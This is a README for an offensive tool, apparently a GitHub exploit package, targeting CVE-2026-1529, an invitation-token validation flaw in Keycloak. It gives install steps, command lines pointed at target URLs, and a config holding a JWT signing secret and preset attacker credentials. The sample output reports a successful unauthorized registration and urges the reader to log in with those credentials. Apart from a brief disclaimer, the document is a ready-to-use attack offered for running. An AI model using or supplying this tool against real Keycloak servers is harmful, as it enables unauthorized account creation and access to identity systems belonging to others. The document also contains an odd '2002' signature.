
Keycloak: Unauthorized organization registration via improper invitation token validation
CVE-2026-1529: Keycloak - Unauthorized organization registration via improper invitation token validation
⚠️ WARNING: This tool is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal.
This tool demonstrates a critical vulnerability in Keycloak (CVE-2026-1529) that allows unauthorized organization registration through improper JWT invitation token validation. The exploit manipulates invitation tokens to gain unauthorized access to Keycloak instances.
Vulnerability Details:
# Clone the repository
git clone https://github.com/yourusername/cve-2026-1529-exploit.git
cd cve-2026-1529-exploit
# Create virtual environment
python3 -m venv venv
source venv/bin/activate # On Windows: venv\Scripts\activate
# Install dependencies
pip install -r requirements.txt
# Create directory structure
mkdir -p keycloak-exploit/{utils,config,logs,output/reports}
cd keycloak-exploit
# Download files from releases or copy manually
# Then install dependencies
pip install requests urllib3 PyJWT
keycloak-exploit/
├── keycloak-exploit.py # Main exploit script
├── requirements.txt # Python dependencies
├── README.md # This file
├── config/
│ └── default_config.json # Configuration file
├── utils/
│ ├── __init__.py # Package initializer
│ ├── http_utils.py # HTTP client utilities
│ ├── jwt_utils.py # JWT manipulation
│ └── crypto_utils.py # Crypto utilities
├── logs/ # Auto-generated logs
└── output/
└── reports/ # Exploit reports
python3 keycloak-exploit.py https://target-keycloak.com
# With custom invitation token
python3 keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... https://target.com
# With custom organization ID
python3 keycloak-exploit.py -o custom_org_id https://target.com
# With custom configuration file
python3 keycloak-exploit.py -c /path/to/config.json https://target.com
# Enable debug logging
python3 keycloak-exploit.py -d https://target.com
# Show help
python3 keycloak-exploit.py -h
# Show version
python3 keycloak-exploit.py -v
| Argument | Short | Description |
|---|---|---|
target | - | Target Keycloak URL (required) |
--token | -t | Custom invitation token |
--org-id | -o | Custom organization ID |
--config | -c | Path to configuration file |
--debug | -d | Enable debug logging |
--version | -v | Show version information |
--help | -h | Show help message |
Edit config/default_config.json to customize exploit parameters:
{
"exploit": {
"default_username": "admin_user_2026",
"default_password": "KeycloakCVE2026!",
"default_email": "[email protected]",
"timeout": 30,
"max_retries": 3
},
"jwt": {
"algorithm": "HS256",
"secret_key": "keycloak-cve-2026-1529-exploit",
"token_expiry": 3600
},
"target": {
"endpoints": {
"realms": "/realms",
"organizations": "/organizations",
"register": "/register",
"login": "/login"
}
},
"output": {
"log_level": "INFO",
"save_reports": true,
"report_format": "txt"
}
}
| Section | Parameter | Description | Default |
|---|---|---|---|
exploit | default_username | Username for registration | admin_user_2026 |
exploit | default_password | Password for registration | KeycloakCVE2026! |
exploit | default_email | Email for registration | [email protected] |
exploit | timeout | HTTP request timeout (seconds) | 30 |
exploit | max_retries | Max HTTP retries | 3 |
jwt | algorithm | JWT signing algorithm | HS256 |
jwt | secret_key | JWT secret key | Custom |
jwt | token_expiry | Token expiry (seconds) | 3600 |
The exploit works in the following steps:
Vulnerability Check
Token Generation/Manipulation
User Registration
Login Verification
Report Generation
output/reports/┌─────────────────┐
│ Target Check │
└────────┬────────┘
│
▼
┌─────────────────┐
│ Token Gen/Get │
└────────┬────────┘
│
▼
┌─────────────────┐
│ Token Manipulate│
└────────┬────────┘
│
▼
┌─────────────────┐
│ User Register │
└────────┬────────┘
│
▼
┌─────────────────┐
│ Login Test │
└────────┬────────┘
│
▼
┌─────────────────┐
│ Report Gen │
└─────────────────┘
============================================================
CVE-2026-1529 EXPLOIT RESULTS
============================================================
✓ Target is vulnerable to CVE-2026-1529
🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target.com/realms/master/account
📄 Report saved to: output/reports/exploit_report_20260211_050507.txt
🔐 Use the provided credentials to access the Keycloak instance!
⚠️ This demonstrates unauthorized access due to CVE-2026-1529
============================================================
by f3ds cr3w est, 2002
============================================================
A detailed report is saved to output/reports/ containing:
Logs are saved to logs/ directory with detailed execution information.